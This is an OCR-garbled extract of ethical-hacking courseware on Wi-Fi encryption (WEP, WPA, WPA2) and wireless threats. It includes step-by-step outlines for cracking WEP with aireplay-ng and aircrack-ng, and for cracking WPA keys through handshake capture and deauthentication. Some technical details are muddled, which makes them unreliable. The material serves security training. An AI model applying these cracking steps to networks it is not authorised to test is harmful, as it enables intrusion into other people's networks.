2 5 1 6 8 None WEP WEP None None
Authentication
Unknown Unknown Unknown Unknown Unknown
Signal
24% 40% 64% 38% 54%
T A BLE 15.4: Various SSID 's and p ercen tage o f signal quality
Module 15 Page 2168
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
M odule Flow
CEH
b H
M o d u le F lo w Wireless encryption is a process of protecting the wireless network from attackers
who can collect your sensitive information by breaching the RF (Radio Frequency) traffic. This section provides insight on various wireless encryption standards such as W EP, W PA, WPA2, W E P issues, how to break encryption algorithms, and how to defend against encryption algorithm cracking.
Wireless Concepts
0*
Wireless Encryption
W ireless Threats
Bluetooth Hacking
Module 15 Page 2169
Module 15 Page 2170
T y p es o f W ir e le ss E n cry p tio n
WEP
9 WEP is an encryption algorithm for IEEE 802.11 wireless networks 6 It is an old and original wireless security standard which can be cracked easily
C EH
WPA
It is an advanced wireless encryption protocol using TKIP, MIC, and AES encryption w Uses a 48 bit IV, 32 bit CRC and TKIP encryption for wireless security
WPA2
WPA2 uses AES (128 bit) and CCMP for wireless data encryption
WPA2 Enterprise
It integrates EAP standards with WPA2 encryption
TKIP
A security protocol used in WPA as a replacement for WEP
AES
It is a symmetric-key encryption, used in WPA2 as a replacement of TKIP
EAP
Supports multiple authentication methods, such as token cards, Kerberos, certificates etc.
LEAP
It is a proprietary WLAN authentication protocol developed by Cisco
RADIUS
It is a centralized authentication and authorization management system
802.H i
It is an IEEE amendment that specifies security mechanisms for 802.11 wireless networks
CCMP
CCMP utilizes 128-bit keys, with a 48-bit initialization vector (IV) for replay detection
W ire le ssE n c ry p tio n
T y p e s o f W ir e le s s E n c r y p tio n The attacks on wireless networks are increasing day by day with the increasing use of wireless networks. Therefore, from this emerging technology have come various types of wireless encryption algorithms to make the wireless network more secure. Each wireless encryption algorithm has advantages and disadvantages. The following are the various wireless encryption algorithms developed so far: 9 W EP: A WLAN clients authenticating and data encryption protocol and it is an old, original wireless security standard that can be cracked easily. Q W PA : It is an advanced WLAN clients authenticating and data encryption protocol using TKIP, MIC, and AES encryption. It uses a 48-bit IV, 32-bit CRC, and TKIP encryption for wireless security. 9 9 9 e W PA2: WPA2 uses AES (128-bit) and CCMP for wireless data encryption. W PA2 Enterprise: It integrates EAP standards with W PA encryption. TKIP: A security protocol used in W PA as a replacement for W EP. AES: It is a symmetric-key encryption, used in WPA2 as a replacement of TKIP.
Module 15 Page 2171
EAP: Uses multiple authentication methods, such as token cards, Kerberos, certificates, etc.
9 9 9
LEAP: A proprietary WLAN authentication protocol developed by Cisco. RADIUS: A centralized authentication and authorization management system. 802.H i: An IEEE standard that specifies security mechanisms for 802.11 wireless networks.
CCMP: CCMP utilizes 128-bit keys, with a 48-bit initialization vector (IV) for replay detection.
Module
15 Page 2172
WEP E ncryption
W h a t Is W E P ?
CEH
Q WEP uses a 24-bit initialization vector (IV) to form stream cipher RC4 for confidentiality, and the CRC-32 checksum for integrity of wireless transmission
Wired Equivalent Privacy (WEP) is an IEEE 802.11 wireless protocol which provides security algorithms for data confidentiality during wireless transmissions
WEP encryption can be easily cracked
64-bit W EP uses a 40-bit key 128-bit W EP uses a 104-bit key size 256-bit W EP uses 232-bit key size
W E P F la w s
It was developed without: 0 Academic or public review Review from cryptologists
It has significant vulnerabilities and design flaws
W E P
E n c r y p tio n
In this section we will discuss W EP encryption as well as its flaws.
W h a t Is W E P E n c r y p tio n ? According to searchsecurity.com, "W ired Equivalent Privacy (W E P ) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard 802.11b." W E P is a component of the IEEE 802.11 W LAN standards. Its primary purpose is to provide confidentiality of data on wireless networks at a level equivalent to that of wired LANs. Physical security can be applied in wired LANs to stop unauthorized access to a network. In a wireless LAN, the network can be accessed without physically connecting to the LAN. Therefore, IEEE utilizes an encryption mechanism at the data link layer for minimizing unauthorized access on WLAN. This is accomplished by encrypting data with the symmetric RC4 encryption algorithma cryptographic mechanism used to defend against threats. Role of W E P in Wireless Communication 9 W EP protects from eavesdropping on wireless communications.
Module 15 Page 2173
9 9
It minimizes unauthorized access to the wireless network. It depends on a secret key. This key is used to encrypt packetsbefore transmission. A mobile station and an access point share this key. An integrity check is performed to ensure that packets are not altered during transmission. 802.11 W E P encrypts only the data between 802.11 stations.
Main Goals of W E P 9 9 9 9 Confidentiality: It prevents link-layer eavesdropping Access Control: It determines who may access the network andwho Data Integrity: It protects the change of data from a third user Efficiency may not
Key points It was developed without: 9 9 Academic or public review Review from cryptologists
It has significant vulnerabilities and design flaws 9 W E P is a stream cipher that plaintext The length of the W EP and the secret key are: 9 9 9 64-bit W EP uses a 40-bit key 128-bit W EP uses a 104-bit key size 256-bit W EP uses 232-bit key size uses RC-4 to produce a stream of bytes that are XORed with
W E P F la w s Some basic flaws undermine W EP's ability to protect against a serious attack: 1. No defined method for encryption 9 9 2. keydistribution:
Pre-shared keys were set once atinstallation and are rarely (if ever) changed. It is easy to recover the number of plaintext messages encrypted with the same key.
Use of RC4, which was designed to be a one-time cipher and not intended formultiple message use: 9 9 As the pre-shared key is rarely changed, the same key is used over and over.
An attacker monitors the traffic and finds out the different ways to work out with the plaintext message.
W ith knowledge of the ciphertext and plaintext, an attacker can compute the key.
Module 15 Page 2174
3.
Attackers analyze the traffic from totally passive data captures and crack the W EP keys with the help of tools such as AirSnort, WEPCrack, and dweputils.
4. 5.
Key generators that are used by different vendors are vulnerable for a 40-bit key. Key scheduling algorithms are also vulnerable to attack.
Module 15 Page 2175
How WEP W orks
UrtifM IUkjI N M k M
CEH
! WEP-encrypted Packet (MAC Frame)
CRC-32 checksum is used to calculate a 32-bit Integrity Check Value (ICV) for the data, which, in turn, is added to the data frame A 24-bit arbitrary number known as Initialization Vector (IV) is added to WEP encryption key; the WEP key and IV are together called as WEP seed
The WEP seed is used as the input to RC4 algorithm to generate a key stream The key stream is bit-wise XORed with the combination of data and ICVto produce the encrypted data The IV is added to the encrypted data and ICV to generate a MAC frame
H o w W E P
W o rk s
To encrypt the payload of an 802.11 frame, the W EP encryption uses the following procedure: 9 9 9 0 A 32-bit Integrity Check Value (ICV) is calculated for the frame data. The ICV is appended to the end of the frame data. A 24-bit Initialization Vector (IV) is generated and appended to the W EP encryption key. The combination of IV and the W EP key is used as the input to RC4 algorithm to generate a key stream. The length of the stream should be same as the combination of ICV and data. Q The key stream is bit-wise XORed with the combination of data and ICV to produce the encrypted data that is sent between the client and the AP. 9 The IV is added to the encrypted combination of data and ICV along with other fields, to generate a MAC frame.
Module 15 Page 2176
W EPKey
Store (Kl,
K2, K3, K4)
.........>
W EP Seed
?......* 1 .............. * toA
i
............
W E P K ey
K e y stre a m
>
IV : 1 .......... ...... :
PAD
KID
C ip h e rtex t
W E P - e n c ry p te d P a c k e t (M A C F ra m e )
FIGURE 15.11: WEP encryption process for encrypting the payload of an 802.11 frame
Module 15 Page 2177
W hat IsWPA?
0
CEH
0
J Wi-Fi Protected Access (WPA) is a data encryption method for WLANs based on 802.11 standards J A snapshot of 802.Hi under development providing stronger encryption, and enabling PSK or EAP authentication
_ 0
TKIP (Temporal Key Integrity Protocol)
W P A Enhances W E P
TKIP utilizes the RC4 stream cipher encryption with 128-bit keys and 64bit M IC integrity check TKIP mitigated vulnerability by increasing the size of the IV and using mixing functions 128-bit Temporal Key
TKIP enhances W E P by adding a rekeying mechanism to provide fresh encryption and integrity keys Temporal keys are changed for every 10,000 packets. This makes TKIP protected networks more resistant to cryptanalytic attacks involving key reuse
S Under TKIP, the client starts with a 128-bit "temporal key" (TK) that is then combined with the client's MAC address and with an IV to create a keystream that is used to encrypt data via the RC4 S It implements a sequence counter to protect against replay attacks
W h a t Is W P A ? W PA stands for Wi-Fi Protected Access. It is compatible with the 802.H i security standard. It is a software upgrade, but may also require a hardware upgrade. In the past, the primary security mechanism used between wireless access points and wireless clients was W EP encryption. The major drawback for W E P encryption is that it still uses a static encryption key. The attacker can exploit this weakness by using tools that are freely available on the Internet. The Institute of Electrical and Electronics Engineers (IEEE) has defined "an expansion to the 802.11 protocols that can allow for increased security." Nearly every Wi-Fi company has decided to employ a standard for increased security called Wi-Fi Protected Access. Data encryption security is increased in W PA as messages are passed through Message Integrity Check (MIC) using the Temporal Key Integrity Protocol (TKIP) to enhance data encryption. The unicast traffic changes the encryption key after every frame using TKIP. The key used in TKIP changes with every frame, and is automatically coordinated between the wireless client and the access point. Q TKIP (Temporal Key Integrity Protocol): TKIP utilizes the RC4 stream cipher encryption with 128-bit keys and 64-bit keys for authentication. TKIP mitigates the W EP key derivation vulnerability by not reusing the same Initialization Vector.
128-bit Temporal Key: Under TKIP, the client starts with a 128-bit "temporal key" (TK) that is then combined with the client's MAC address and with an IV to create a key that
Module 15 Page 2178
is used to encrypt data via the RC4. It implements a sequence counter to protect against replay attacks. 9 W P A Enhances W EP: TKIP enhances W EP by adding a rekeying mechanism to provide fresh encryption and integrity keys. Temporal keys are changed for every 10,000 packets. This makes TKIP protected networks more resistant to cryptanalytic attacks involving key reuse.
Module 15 Page 2179
How WPA Works

Data to Transmit MSDU Key Mixing > MIC key MSDU +MIC
CEH
V WEP seed /
...
...
CRC-32 C hecksum :
XOR Algorithm ..... Keystream
Mac Header
ta
KID
| q |
Ciphertext
Packet to transmit
Temporal encryption key, transmit address, and TKIP sequence counter (TSC) is used as input to RC4 algorithm to generate a Keystream MAC Service Data Unit (MSDU) and message integrity check (MIC) are combined using Michael algorithm
A 32-bit Integrity Check Value (ICV) is calculated for the MPDU
The combination of M PDU and ICV is bitwise XORed with Keystream to produce the encrypted data The IV is added to the encrypted data to generate MAC frame
The combination of MSDU and MIC is fragmented to generate MAC Protocol Data Unit (MPDU)
H o w W P A
W o rk s
To encrypt the payload effectively, the W P A encryption performs the following steps: 9 Temporal encryption key, transmit address, and TKIP sequence counter (TSC) is used as input to RC4 algorithm to generate a key stream. 0 MAC Service Data Unit (M SDU) and message integrity check (MIC) are combined using the Michael algorithm. 9 The combination of MSDU and MIC is fragmented to generate MAC Protocol Data Unit (M PD U). A 32-bit Integrity Check Value (ICV) is calculated for the MPDU. 9 The combination of MPDU and ICV is bitwise XORed with a key stream to produce the encrypted data. 9 The IV is added to the encrypted data to generate MAC frame.
The following diagram illustrates the W PA working process:
Module 15 Page 2180
Data to Transmit
Temporal Encryption Key
Packet to transmit
FIGURE 15.12: Showing the working process of WPA
Module 15 Page 2181
T em poral Keys
In W P A and W PA 2, the encryption keys (tem poral keys) are derived during the four-w ay hand shake
Encryption keys are derived from the P M K that is derived during the EAP a u th e n tica tio n session
In the EAP success message, PM K is sent to the AP but is not directed to the Wi-Fi client as it has derived its own copy of the PMK
J J J J
AP sends an ANonce to client which uses it to construct the Pairwise Transient Key (PTK) Client respond with its own nonce-value (SNonce) to the AP together with a Message Integrity Code (MIC) AP sends the GTK and a sequence number together with another MIC which is used in the next broadcast frames Client confirm that the temporal keys are installed Copyright by EG-ClUIICil. All Rights Reserved. Reproduction is Strictly Prohibited.
T e m p o ra l K e y s For providing privacy to a Wireless LAN over a local RF broadcast network, encryption is a necessary component. Initially W EP is used as the basic or fundamental encryption mechanism but as the flaws are found with the W EP encryption, a new enhanced encryption mechanism, i.e., W PA is used. All the newly deployed equipment is using either TKIP (W PA ) or AES (WPA2) encryption to ensure the WLAN security. In case of W E P encryption mechanism, encryption keys (Temporal Keys) are derived from the PM K (Pairwise M aster Key) that is derived during the EAP authentication session, whereas the encryption keys are derived during the four-way handshake in W PA and WPA2 encryption mechanisms. The method used to derive the encryption keys (temporal keys) is described by the four-way handshake process. Following diagram explains the four-way handshaking process. 9 The AP sends an EAPOL-key frame containing an authenticator nonce (ANonce) to client which uses it to construct the Pairwise Transient Key (PTK). Q Client respond with its own nonce-value (SNonce) to the AP together with a Message Integrity Code (MIC) 9 AP sends the GTK and a sequence number together with another MIC which is used in the next broadcast frames. 9 Client confirms that the temporal keys are installed.
Module 15 Page 2182
Module 15 Page 2183
W hat Is WPA2?
WPA2 provides enterprise and Wi-Fi users with stronger data protection and network access control
CEH
Provides government grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm
WPA2-Personal
S WPA2-Personal uses a set-up password (Pre-shared Key, PSK)to protect unauthorized network access In PSK mode each wireless network device encrypts the network traffic using a 1 2 8bit key that is derived from a passphrase of to 63 ASCII characters
WPA2-Enterprise
It includes EAP or RADIUS for centralized client authentication using multiple authentication methods, such as token cards, Kerberos, certificates etc. Users are assigned login credentials by a centralized server which they must present when connecting to the network
Copyright by EG-G(IIIICil. All Rights Reserved. Reproduction Is Strictly Prohibited.
W h a t Is W P A 2 ? W PA2 (Wi-Fi Protected Access 2) is compatible with the 802.l l i standard. It supports most of the security features that are not supported by W PA. It provides stronger data protection and network access control. It gives a high level of security, so that only authorized users can access it. WPA2 provides enterprise and Wi-Fi users with stronger data protection and network access control. It implements the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm and gives government-grade security. W PA 2 offers two modes of operation: 9 WPA-Personal: This version makes use of a setup password (pre-shared key, PSK) and protects unauthorized network access. In PSK mode each wireless network device encrypts the network traffic using a 256 bit key which can be entered as a passphrase of 8 to 63 ASCOO characters. 9 WPA-Enterprise: This confirms the network user through a server. It includes EAP or RADIUS for centralized client authentication using multiple authentication methods, such as token cards, Kerberos, certificates etc. Users are assigned login credentials by a centralized server which they must present when connecting to the network.
Module 15 Page 2184
HowWPA2 Works
Priority destination address PN Temporal key Plaintext data
CEH
V
Nonce
V
AES > CCMP
&
.............. ............... .... ................ . . . y ...........
MAC header
CCMP header
Encrypted data
Encrypted MIC
WPA2 MAC Frame
In th e C C M P im plem entation of W PA 2 , M A C he ad er d ata is used to build additional authentication data (AAD)
AAD, tem poral key and nonce along w ith CC M P are used for data encryption A UIDA p \,1 A/ r- - : . K D A w p a z m a c Fram e is Dun using m a c neaaer, CCM P header, encrypted data and encrypted M IC
h A A
A sequenced packet n u m b e r (P N ) is used to build nonce
Copyright by EG-G(HIICil. All Rights Reserved. Reproduction is Strictly Prohibited.
r >> H o w W P A 2 W o r k s
> In the CCMP procedure, additional authentication data (AAD) is taken from the MAC
header and included in the CCM encryption process. This protects the frame against alteration of the non-encrypted portions of the frame. A sequenced packet number (PN) is included in the CCMP header to protect against replay attacks. The PN and portions of the MAC header are used to generate a nonce that in turn is used by the CCM encryption process.
Module 15 Page 2185
Priority destination address MAC header Temporal key Plaintext data
AAD
....... V .....V ..... V ....

M AC header CCMP header Encrypted data Encrypted M IC W PA 2 MAC Frame
FIGURE 15.14: Working of WPA2
Module 15 Page 2186
W EPvs.W PAvs.W PA2

Encryption
o =
WEP WPA WPA2
CEH
Attributes
Encryption Algorithm
RC4 RC4, TKIP AES-CCMP
IV Size
24-bits 48-bit 48-bit
Encryption Key Length

40/104-bit 128-bit 128-bit
Integrity Check Mechanism

CRC-32 Michael algorithm and CRC-32 CBC-MAC
1 1
-----------------------------------------------------------------T> Should be replaced with more secure WPA and WPA2 W EP WPA, WPA2
Incorporates protection against forgery and replay attacks
W E P vs. W P A
vs. W P A 2
W EP's primary purpose is to provide confidentiality of data on wireless networks at a level equivalent to that of wired LANs, but it is weak and fails to meet any of its goals. It is a data encryption method for 802.11 WLANs. W PA fixes most of W EP's problems but adds some new vulnerability. WPA2 is expecting to make wireless networks as secure as wired networks. It guarantees the network administrators that only authorized users can access the network. If you are using W EP, then you should replace it with either W PA or WPA2 in order to secure your network or communication over Wi-Fi network. Both W PA and WPA2 incorporate protection against forgery and replay attacks.
Encryption Encryption Algorithm W EP W PA RC4 RC4, TKIP
Attributes IV Size Encryption Key Length 24-bit 48-bit 40/104-bit 128-bit Integrity Check Mechanism CRC-32 Michael algorithm and CRC-32
Module 15 Page 2187
W PA 2
AES-CCMP
48-bit
128-bit
AES-CCMP
TABLE 15.5: Com parison between WEP, WPA and WPA2
Module 15 Page 2188
WEP Issu es
The IV is a 24-bit field is too small and is sent in the cleartext portion of a message No defined method for encryption key distribution
Identical key streams are produced with the reuse of the same IV for data protection, as the IV is short key streams are repeated within short time
Wireless adapters from the same vendor may all generate the same IV sequence. This enables attackers to determine the key stream and decrypt the ciphertext
Lack of centralized key management makes it difficult to change the W E P keys with any regularity
Associate and disassociate messages are not authenticated
When there is IV Collision, it becomes possible to reconstruct the RC4 keystream based on the IV and the decrypted payload of the packet
WEP does not provide cryptographic integrity protection. By capturing two packets an attacker can flip a bit in the encrypted stream and modify the checksum so that the packet is accepted
IV is a part of the RC4 encryption key, leads to a analytical attack that recovers the key after intercepting and analyzing a relatively small amount of traffic
W E P is based on a password, prone to password cracking attacks
Use of RC4 was designed to be a one-time cipher and not intended for multiple message use
An attacker can construct a decryption table of the reconstructed key stream and can use it to decrypt the W EP Packets in real-time
Copyright by EC-C(nncil. All Rights Reserved. Reproduction is Strictly Prohibited.
W E P
Is s u e s
1. e
W EP has the following issues: CRC32 is not sufficient to ensure complete cryptographic integrity of a packet: By capturing two packets, an attacker can reliably flip a bit in the encrypted stream, and modify the checksum so that the packet is accepted
2.
IVs are 24 bits: e An AP broadcasting 1500 byte packets at 11 Mb/s would exhaust the entire IV Space in five hours
3.
Known plaintext attacks: Q W hen there is an IV collision, it becomes possible to reconstruct the RC4 keystream based on the IV and the decrypted payload of the packet
4.
Dictionary attacks: e W EP is based on a password
Module 15 Page 2189
The small space of the initialization vector allows the attacker to create a decryption table, which is a dictionary attack
5.
Denial of services: e Associate and disassociate messages are not authenticated
6.
Eventually, an attacker can construct a decryption table of reconstructed key streams: e W ith about 24 GB of space, an attacker can use this table to decrypt W E P packets in real-time
7. A lack of centralized key management makes it difficult to change W E P keys with any regularity 8. IV is a value that is used to randomize the key stream value and each packet has an IV value: e e The standard allows only 24 bits, which can be used within hours at a busy AP IV values can be reused
9. The standard does not dictate that each packet must have a unique IV, so vendors use only a small part of the available 24-bit possibilities: 6 A mechanism that depends on randomness is not random at all and attackers can easily figure out the key stream and decrypt other messages Since most companies have configured their stations and APs to use the same shared key, or the default four keys, the randomness of the key stream relies on the uniqueness of the IV value. The use of IV and a key ensures that the key stream for each packet is different, but in most cases the IV changes while the key remains constant. Since there are only two main components to this encryption process where one stays constant, the randomization of the process decreases to an unacceptable level. A busy access point can use all available IV values (224) within hours, which requires the reuse of IV values. Repetition in a process that relies on randomness ends up in futile efforts and non-worthy results. W hat makes the IV issue worse is that the 802.11 standard does not require each packet to have a different IV value, which is similar to having a "Beware of Dog" sign posted but only a Chihuahua to provide a barrier between intruders and the valued assets. In many implementations, the IV value only changes when the wireless NIC reinitializes, usually during a reboot, 24 bits for the IV value provide enough possible IV combination values, but most implementations use a handful of bits; thus not even utilizing all that is available to them.
Module 15 Page 2190
W eak In itia liza tio n Vectors (IV)

In the RC4 algorithm, the Key Scheduling Algorithm (KSA) creates an IV based on the base key A flaw in the WEP implementation of RC4 allows "weak" IVs to be generated Those weak IVs reveal information about the key bytes they were derived from An attacker will collect enough weak IVs to reveal bytes of the base key
CEH
UrtrfW* ttfciul NMhM
The IV value is too short and not protected from reuse and no protection again message replay
The way the keystream is No effective detection constructed from the IV of message tampering makes it susceptible to weak (message integrity) key attacks (FMS attack)
It directly uses the master key and has no built-in provision to update the keys
Copyright by EG-Gtlincil. All Rights Reserved. Reproduction is Strictly Prohibited.
W e a k In it ia liz a t io n V e c to rs (IV s ) The following are the reasons that make the initialization vectors eeak: In the RC4 algorithm, the Key Scheduling Algorithm (KSA) creates an IV based on the base key The IV value is too short and not protected from reuse and no protection again message replay A flaw in the W EP implementation of RC4 allows "weak" IVs to be generated The way keys are constructed from the IV makes it susceptible to weak key attacks (9FMS attack) e Those weak IVs reveal information about the key bytes they were derived from No effective detection of message tampering (message integrity)
An attacker can collect enough weak IVs to reveal bytes of the base key It directly uses the master key and has no built-in provision to update the keys
Module 15 Page 2191
How to Break WEP E ncryption

Test the injection capability of the wireless device to the access point Start Wi-Fi sniffing tool such as airodump-ng or Cain & Abel with a bssid filter to collect unique IVs
(e d ifie d ttfcK jl H a th c f
C EH
Run a cracking tool such as Cain & Abel or aircrack-ng to extract encryption key from the IVs
g,
Use a tool such as aireplay-ng to do a fake authentication with the access point Start a Wi-Fi packet encryption tool such as aireplay-ng in ARP request replay mode to inject packets
Start the wireless interface in monitor mode on the specific access point channel
Copyright by EG-Gtnncil. All Rights Reserved. Reproduction is Strictly Prohibited.
H o w to B r e a k
W E P
E n c r y p tio n
&
Gathering lots of initialization vectors (IVs) is the necessary thing in order to break
the W EP encryption key. The attacker should gather sufficient IVs to crack the W EP key by simply listening to the network traffic and saving them. Injection can be used to speed up the IV gathering process. Injection allows capturing a large number of IVs in a short period of time. Captured IVs can be used to determine the W E P key. To break the W EP encryption the attacker should follow these steps: 9 Start the wireless interface in monitor mode on the specific access point channel In this step the attacker should turn the wireless interface into monitor mode. In monitor mode the interface can listen to every packet in the air. The attacker can select some packets for the injection by listening to every packet available in the air. Q Test the injection capability of the wireless device to the access point Here the attacker should test whether the wireless interface is within the range of the specified AP and also whether it is capable of injecting packets to it. 9 Use a tool such as aireplay-ng to do a fake authentication with the access point
Module 15 Page 2192
Here the attacker should ensure that the source MAC address is already associated so that the injecting packet is accepted by the access point. The injection fails because of the lack of association with the access point. 9 Start Wi-Fi sniffing tool In this step the attacker should capture the IVs generated by making use of tools such as airodump-ng with a bssid filter to collect unique IVs. Start a Wi-Fi packet encryption tool such as aireplay-ng in ARP request replay mode to inject packets The attacker should aim at gaining a large number of IVs in a short period of time. This can be achieved by turning the aireplay-ng into ARP request replay mode which listens for ARP requests and then re-injects them back into the network. The AP usually rebroadcast the packets generating a new IV. So in order to gain large number of IVs the attacker should select ARP request mode. 9 Run a cracking tool such as Cain & Abel or aircrackng Using the cracking tools such as Cain & Abel, aircrack-ng the attacker can extract W EP encryption keys from the IVs.
Module 15 Page 2193
How to B reak WEP E ncryption

(C ontd)
Cotifwd
C EH
itfcKjl NMhM
H o w to B r e a k W E P
E n c r y p tio n
( C o n t d )
W PA encryption is less exploitable when compared with W E P encryption. W PA/W AP2
can be cracked by capturing the right type of packets. Cracking can be done in offline and it needs to be near the AP for few moments. ^ W PA PSK It uses a user-defined password to initialize the TKIP, which is not crackable as it is a per-packet key but the keys can be brute-forced using dictionary attacks. A dictionary attack takes care of consumer passwords. O fflin e A tta c k To perform an offline attack, you only have to be near the AP for a matter of seconds in order to capture the W PA /W PA 2 authentication handshake. By capturing the right type of packets, W PA encryption keys can be cracked offline. In W PA handshake password is not actually sent across the network since typically the W PA handshake occurs over insecure channels and in plaintext. Capturing full authentication handshake from a real client and the AP helps in breaking the W PA/W PA2 encryption without any packet injection. D e - a u th e n tic a tio n A t t a c k
Module 15 Page 2194
To perform de-authentication attack in order to break the W P A encryption, you need a real, actively connected client. Force the connected client to disconnect, and then capture the reconnect and authentication packet using tools such as airplay, you should be able to reauthenticate in a few seconds then attempt to dictionary brute force the PMK. B ru te - F o rc e W P A K e y s Brute-force techniques can be used to break W PA /W PA 2 encryption keys. A bruteforce attack on W PA encryption keys can be performed by making use of a dictionary. Or it can be done by using tools such as aircrack, aireplay, or KisMac to brute force W PA keys. The impact of brute force on W A P encryption is substantial because of its compute intensive nature. Breaking the W PA keys through brute-force technique may take hours, days, or even weeks.
Module 15 Page 2195
How to D efend A gainst WPA Cracking

Passphrases
only way to crack WPA is to sniff the password PMK associated with the "handshake" authentication process, and if this password is extremely complicated, it will be almost impossible to crack
C EH
Passphrase Complexity
Select a random passphrase that is not made up of dictionary words Select a complex passphrase of a minimum of 20 characters in length and change it at regular intervals
Client Settings
Use WPA2 with AES/CCMP encryption only 9 Properly set the client settings (e.g. validate the server, specify server address, don't prompt for new servers, etc.)
Additional Controls
Use virtual-private-network (VPN) technology such as Remote Access VPN, Extranet VPN, Intranet VPN, etc. Implement a Network Access Control (NAC) or Network Access Protection (NAP) solution for additional control over end-user connectivity
Copyright by EC-C(ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
H o w to D e f e n d A g a in s t W P A
C r a c k in g
&
cracking:
The following are the measures that can be taken to protect the network from W PA
P a ssp h ra se The only way to crack W P A is to sniff the password PM K associated with the "handshake" authentication process, and if this password is extremely complicated, it can be almost impossible to crack. Password can be made complicated by including a combination of numbers, upper and lowercase letters and symbols in phrase, and the length of the phrase should be as long as possible. P a s s p h r a s e C o m p le x ity To make the passphrase complex, select a random passphrase that is not made up of dictionary words. Select a complex passphrase of a minimum of 20 characters in length and change it at regular intervals. % A d d it io n a l C o n tr o ls Implementing additional controls over end-user connectivity helps in protecting the
Module 15 Page 2196
network from W P A cracking. Implement a Network Access Control (NAC) or Network Access Protection (NAP) solution for additional control over end-user connectivity. Use virtual-privatenetwork (VPN) technology such as a remote access VPN, an extranet VPN, an intranet VPN, etc. C lie n t S e ttin g s Use W PA 2 with AES/CCMP encryption only. Properly set the client settings (e.g., validate the server, specify server address, don't prompt for new servers, etc.).
Module 15 Page 2197
Module Flow
CE H
M o d u le F lo w So far, we have discussed various Wi-Fi concepts and wireless security mechanisms such as encryption algorithms. Now, we will discuss the security risk associated with wireless networks. This section covers various wireless threats and attacks such rogue access point attacks, client mis-association, denial of service attacks, etc.
(^S^)
Wireless Concepts
10 *
Wireless Encryption
W ireless Threats
W ireless Hacking Methodology
Bluetooth Hacking
Countermeasure
^ V
W ireless Security Tools
Module 15 Page 2198
Wi-Fi Pen Testing
Module 15 Page 2199
Wireless Threats: Access Control Attacks

J
EH
Wireless access control attacks aims to penetrate a network by evading WLAN access control measures, such as AP MAC filters and Wi-Fi port access controls
War Driving
MAC Spoofing
Ad Hoc Associations
Client Mis-association
Rogue Access Points
AP Misconfiguration
Promiscuous Client
Unauthorized Association
Copyright by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
W ir e le s s T h re a ts : A c c e s s C o n tr o l A tta c k s Wireless access control attacks aim to penetrate a network by evading wireless LAN access control measures, such as AP MAC filters and Wi-Fi port access controls. There are several kinds of access control attacks. The following are the types of access control attacks on wireless networks: W a r d r iv in g In a wardriving attack, wireless LANS are detected either by sending probe requests over a connection or by listening to web beacons. Once a penetration point is discovered, further attacks can be launched on the LAN. Some of the tools that can be used to perform wardriving are KisMAC, Netstumbler, and WaveStumber. R o g u e A c c e s s P o in ts
&
In order to create a backdoor into a trusted network, an unsecured access point or fake access point is installed inside a firewall. Any software or hardware access points
can be used to perform this kind of attack. M A C S p o o fin g Using the MAC spoofing technique, the attacker can reconfigure the MAC address to appear as an authorized access point to a host on a trusted network. The tools for
Module 15 Page 2200
carrying out this kind of attack are: changemac.sh, SMAC, and Wicontrol. A d H o c A s s o c ia tio n s ^ 9 This kind of attack can be carried out by using any USB adapter or wireless card. In this method, the host is connected to an unsecured station to attack a particular station or to avoid access point security. A P M is c o n fig u r a t io n If any of the critical security settings is improperly configured at any of the access points, the entire network could be open to vulnerabilities and attacks. The AP can't trigger alerts in most intrusion-detection systems, as it is authorized as a legitimate device on the network. C lie n t M is a s s o c ia tio n The client may connect or associate with an AP outside the legitimate network either intentionally or accidentally. This is because the W LAN signals travel through walls in the air. This kind of client misassociation thus can be lead to access control attacks. U n a u t h o r iz e d A s s o c ia t io n Unauthorized association is the major threat to wireless network. Prevention of this kind of attack depends on the method or technique that the attacker uses in order to get associated with the network. P r o m is c u o u s C lie n t The promiscuous client offers an irresistibly strong signal intentionally for malicious purposes. Wireless cards often look for a stronger signal to connect to a network. In this way the promiscuous client grabs the attention of the users towards it by sending strong signal.
Module 15 Page 2201
W ireless Threats: Integrity Attacks
C EH
r r In integrity attacks, attackers send forged control, management or data frames over a wireless j network to misdirect the wireless devices in order to perform another type of attack (e.g., DoS) J I____
1 Data Frame Injection ^ 5 Bit-Flipping Attacks ^

j j
*
k-
WEP Injection
j
4
V
Data Replay
*
J
Initialization Vector Replay Attacks
6 ^ Extensible AP Replay
j
7 RADIUS Replay
8 Wireless Network Viruses
Copyright by EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited.
W ir e le s s T h re a ts : In t e g r it y A tta c k s In integrity attacks, attackers send forged control, management, or data frames over a wireless network to misdirect the wireless devices in order to perform another type of attack (e.g., DoS). Type of attack Description Method and Tools
D ata F ra m e In je c tio n
Crafting frames.
and
sending
forged
802.11
Airpwn, File2air, libradiate, v o id ll, W EPW edgie, wnet dinject/reinject
W E P In je c tio n
Crafting and sending encryption keys.
forged
W EP
W EP tools
cracking
+ injection
D ata R e p la y In itia liz a tio n V e c to r R e p la y A tta ck s
Capturing 802.11 data frames for later (modified) replay. The key stream is derived by sending the plain-text message.
Capture + injection tools
Module 15 Page 2202
B it- F lip p in g A tta ck s
Captures the frame and flips random bits in the data payload, modifies ICV, and sends to the user. Capturing Authentication 802.IX Protocols Extensible (e.g., EAP Wireless capture + injection tools between station and AP Ethernet capture + injection tools between AP and authentication server
E x te n s ib le A P R e p la y
Identity, Success, Failure) for later replay. Capturing RADIUS Access-Accept or
R A D IU S R e p la y
Reject messages for later replay Viruses have their impact on the wireless
W ir e le s s N e tw o rk V iru s e s
network to a great extent. It allows the attacker with simplest ways for attacking on APs. TABLE 15.6: Various types of integrity attacks with description and tools
Module 15 Page 2203
Wireless Threats: Confidentiality Attacks
Urtifwtf
C EH
ilhiul lUthM
These attacks attempt to intercept confidential information sent over wireless associations, whether sent in the clear text or encrypted by Wi-Fi protocols
Tv
W ir e le s s T h r e a ts : C o n fid e n tia lity A tta c k s These attacks attempt to intercept confidential information sent over wireless
associations, whether sent in the cleartext or encrypted by Wi-Fi protocols.
Type of attack
D e scrip tio n Capturing and decoding unprotected
M e th o d and T o o ls bsd-airtools, Ethereal, Ettercap, Kismet, commercial analyzers
E a v e s d ro p p in g
application traffic to obtain potentially sensitive information. Implication of information from the
T ra ffic A n a ly s is
